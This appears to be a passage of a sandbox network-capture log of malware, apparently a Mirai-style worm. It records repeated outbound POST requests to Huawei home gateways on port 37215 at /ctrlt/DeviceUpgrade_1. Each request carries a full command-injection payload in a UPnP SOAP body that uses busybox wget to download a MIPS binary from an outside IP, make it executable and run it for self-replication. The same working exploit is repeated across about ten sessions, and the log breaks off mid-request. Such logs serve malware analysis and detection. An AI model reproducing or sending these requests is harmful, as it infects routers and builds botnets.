                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2342192.168.2.1545202197.204.224.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.377034903 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2343192.168.2.1558414157.188.30.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.339848042 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2344192.168.2.153984441.179.51.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.339936018 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2345192.168.2.153393441.17.131.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.339957952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2346192.168.2.1560708157.117.109.22537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.339987993 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2347192.168.2.153548868.1.94.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.340003967 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2348192.168.2.1558572138.253.226.10137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.340029955 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2349192.168.2.1554680197.139.255.4137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.340050936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2350192.168.2.1553412197.54.106.12837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.340075016 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2351192.168.2.153950436.53.67.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.346132994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
